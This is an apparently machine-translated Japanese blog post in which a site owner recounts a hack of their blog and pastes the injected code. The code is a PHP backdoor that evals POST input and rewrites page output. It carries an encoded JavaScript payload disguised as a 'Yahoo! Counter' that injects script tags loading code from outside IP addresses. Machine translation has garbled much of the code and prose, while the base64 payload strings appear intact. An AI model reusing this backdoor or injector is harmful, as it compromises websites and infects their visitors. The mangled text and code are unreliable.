沖縄で実行

私のサイトがどのデータベースのエラーがフロントエンドに表示する原因ハッキングされた。 誰かがそこに自分自身には、ftpアカウントを作成し、私phpとhtmファイルにコードを注入し、私のSQLデータベースになった。 私はそれらが私のブログのソフトウェアのデフォルト設定では、脆弱性を利用ので、私は削除し、すべてを再インストールと思います。 私は、デフォルトの設定を変更および削除は、不正なアカウントとは、アクセスしたすべてのファイル。 私は、これらのデフォルト設定は自分たちのレーダーに私を置くと思います。 彼らはたぶん、サイトの既定値を使用して検索を実行し、それに対する彼らのハッキングツールを走った。 私は確かにそれは彼らが走った自動化されたプログラムは、コードを挿入するすべてのhtmファイルとphpファイルが同じ場所で同じ挿入されたコードがあったのでだったと思うよ。 今はすべて安全行ってもいいことがあります。 私はすべてのコードをやり遂げました、何を不審とパッチの既知の脆弱性をクリアされます。 自分のサイトは現在、新しい顔だけでなく、新しい鎧をしています。 うまくいけば、この二度としません。

ここでは使用されるコードです：

<span > （もし！にfunction_exists（'tmp_lkojfghx'））（（$ i = 1の; $ iが<100; $ iは+ +）/ m'の場合（is_file（$ fは='/ tmpです。$ 1））（のinclude_once（$ f）は;破る;）（どうかの判断は、（$ _POST ['tmp_lkojfghx3']））はeval（$ _POST ['tmp_lkojfghx3']）;（！定義されて（'TMP_XHGFJOKLは'））を定義する場合場合（'TMP_XHGFJOKL'、またはbase64_decode（'PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIAppZih0eXBlb2YoeWFob29fY291bnRlcikhPXR5cGVvZigxKSlldmFsKHVuZXNjYXBlKCclMkYhJTJGISUzQyU2NGklNzYlMjAlNzN8dHl + bGU9ISU2NCQlNjklNzMjJTcwbGF5OnwlNkVvbmBlYCUzRSZcbiZkISU2RiU2M3UkJTZEIWUlNkV8dHwlMkUkJTc3JTcyJTY5JTc0JTY1JTI4YCIhJTNDJiUyRn50IWV4ISU3NCU2MSU3MiFlJCU2MSQlM0UlMjIlMjklM0IlNzZgYSQlNzIkJTIwJTY5JTJDJTVGJix8YSE9JTVCJiUyMiQlMzclMzglMkUhJTMxQDElMzAlMkUxJTM3JTM1Iy4lMzIlMzFgJTIyISUyQyIkJTMxJTM5JTM1JTJFJTMyfDQuN3w2LjJ + JTM1ISUzMSYlMjImJTVEO3xfPSUzMSUzQn5pYCU2NiElMjhkfCU2RmMlNzVtYGV + bkAlNzR8JTJFYyMlNkYkJTZGJCU2QiU2OSMlNjUlMkUmbSU2MUAlNzRjIyU2OCgmL2AlNUMlNjJoIyU2N2YjJTc0JTNEJCUzMSElMkYpfiUzRCUzRCElNkUhJTc1JTZDbCMpZm8lNzIkJTI4JTY5JTNEfiUzMHwlM0IhJTY5YCUzQyUzMiUzQiMlNjkrJTJCfCUyOSFkJTZGJmMlNzVtYCU2NSU2RXQlMkV3I3IhJTY5ISU3NCMlNjUjKH4lMjJ8JTNDQCU3M2MlNzJpJTcwdGAlM0UjJTY5ZiElMjh8JTVGQCUyOSQlNjQjJTZGJTYzfHUmJTZEJTY1fG4lNzQlMkUlNzclNzIlNjl8JTc0ZSglNUMlMjJ + JTNDcyU2MyYlNzIlNjlwI3QmJTIwfGl + ZHw9JTVGIitgJTY5YCt8JTIyXyUyMCElNzNyYyUzRGAlMkYjL0AiJiUyQiU2MVslNjklNUQlMkIkJTIyJTJGJTYzfnAvJCUzRiUyMiUyQn4lNkUmJTYxdiU2OWAlNjclNjEjdG8mci4kJTYxJTcwJCU3MCU0RSU2MSYlNkRlJTJFJmNAaCU2MXJgQXQoJTMwJTI5KyQlMjIlM0UmJTNDQCU1Q34lNUMjLyU3M0BjIXIlNjklNzB0IyUzRUAlNUN + JTIyKSElM0MjJTVDJTJGQHNjJTcyJTY5JnB0QCUzRXwifCl8JTNCXG4vIy8jJTNDJTJGZGklNzYlM0UnKS5yZXBsYWNlKC9cJnxcfHxAfH58YHxcJHwjfFwhL2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo ='));関数tmp_lkojfghx（$ s）を（するif（$ gを=（bin2hex（substrは（$秒、0,2 ))==' 1f8b'））$ sの= （substrは（$ sの））10日-8 gzinflate;場合（preg_match_all（'＃</span> <script(.*?)</script> <span > ＃'は、$ sを、$））foreachの（$ [0]は$ v）をする場合（カウント（爆発（"n"は、$ v）を）> 5）（$電子= preg一matchの('#['"です[^は'".,;?![]:/<>()]{ 30 ,}#',$五）| | preg一matchの('#[([](は*だだdが+）（20、） ＃'、$ v）は、場合は（（はは、preg_match（'＃bevalb＃'、$五)&&($は、電子| | strposは（$五、'')))||($電子＆strpos（$五、'文書をfromCharCode。 ）')))$の= str_replaceのを（$五、"$ sを書く;）$ s1は= preg_replace（またはbase64_decode（'IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw =='),",$ s）が、場合（stristrは（$ sを、'</span> </body'))$s=preg_replace('#(s*</body)#mi',str_replace('$','\$',TMP_XHGFJOKL).'1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title> <span > '））$ sの= $ s1.TMP_XHGFJOKL;戻り$ gに？gzencode（$秒）：$ sの;）関数tmp_lkojfghx2（$ = 0、$ b = 0、$ c = 0の、$ d個の= 0）（$掲載=配列（）;（$ b＆＆$ GLOBALSは['tmp_xhgfjokl']）のコールcall_user_func（$ GLOBALSは['tmp_xhgfjokl']、$、$ b、$ cを$場合d）は、foreachの（@ ob_get_status（1）$としてvは）（（$ = $五['名前'])==' tmp_lkojfghx'）を返す場合は他の$ [] =配列（$ =='デフォルトの出力ハンドラ'？偽：$だ）;の（ $ iが=カウントが（$ s）を-1; $ iは> = 0; $ iは-）（$が=にob_get_contents（）[$ iを] [1]です。ob_end_clean（）を;）のob_start（'tmp_lkojfghx'）;の（ $ iは= 0; $ iは</span> <count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2();</p><p> <span >ヤフー！カウンタが開始</span> <br /> <span > = typeof演算（1））はeval（（'$％2階％3C |％64％69％76％20＃％73＆％74＆yは〜lの65％= @ dは〜％％の2階をアンエスケープ（typeof演算（yahoo_counter場合）！69＆％ 73pl＆％の61y：@非％65％3Eのは`n！dは@ 0％63u〜男性`トン＆％2Eは〜％77`％72 $％69％74％65％28 |％22！％3C％2階〜％74e ％78％74 $％61`rの％记吸気空％3Eの"#);@五|お％61 |％72％20％69＆％2Cを|％5階〜％2Cを％61 `=[~% 22＆％37！％38 ％の2Eは＆1 |％31 $％30％2Eは％31 $を％37！％35 @％2E21〜％22％2Cを％22 $％31 $を％39〜％35〜0.2パーセント34％2Eは`％37`6〜 @ 2 @ 5％31＆"％の王5D $％の3B！_％次元％31＃％の3B＆％69 | f $が％28％64％ビル6F％63％75 |メートル％65％6Eの＆％の74.c | ooを@ kは％が69 @電子|％の6Dの@％61％74〜Cの`％68！％28％2階@％の5CBの＃％68％67 $％66 |％74 |％3％31 /#)== n個の％ 75％6Cと|のリットル＆％29！fは@ 0％72 |％28 |私は％の3D＆％30`％の3B＆アイ！％の3C2;％69 @％2Bは％2Bに％29d＆Oの@％63％75％6De％6Eの@のt％ 2Eは％77 @％72 |％69 |トン`％65（％22％3C％73！％63 @％72〜％69％70〜％74％3Eの％69 | fは！（_％29d＃オ〜％ 63！％75％6Dの％65n％74.wri`％74％65 @％28％5Cの％22`％型3C @％73％63の`r＃％の69p＆74％$％20％69＃％64％3D_＆" 〜+`私＆+＃％22！_％20％73r％63 |％3％2階|％2階`"+@% 61 [i]を！％2Bに@"`/#% 63 @％70％2階|？ `"&+& n＃％61v％69グラム$％61％74％6階| rを〜％2Ea＃％70％70＃％4Eを％61＆mの65％@％63 |％68ar％41％74（0）$％ 2Bは％22％3Eの＆％の3C対潜哨戒％の5Cの！％5Cの| /`％73 $％63 $％72％69％70％74＆％の3Eの＃％5Cの`"`)|% 3C＃％5C/scドル％72 ！％69＆％70！トンの％3Eの％22 $％29％30億＆％2階！％2階％3C @％2階|ディ76％$％3Eは'）。(/~|@|#|&|`|$交換|||!/は,""));ヴァールyahoo_counter gの= 1;カウンタエンド</span>

これがある場合、または似たようなあなたに起こっているコメントを残し。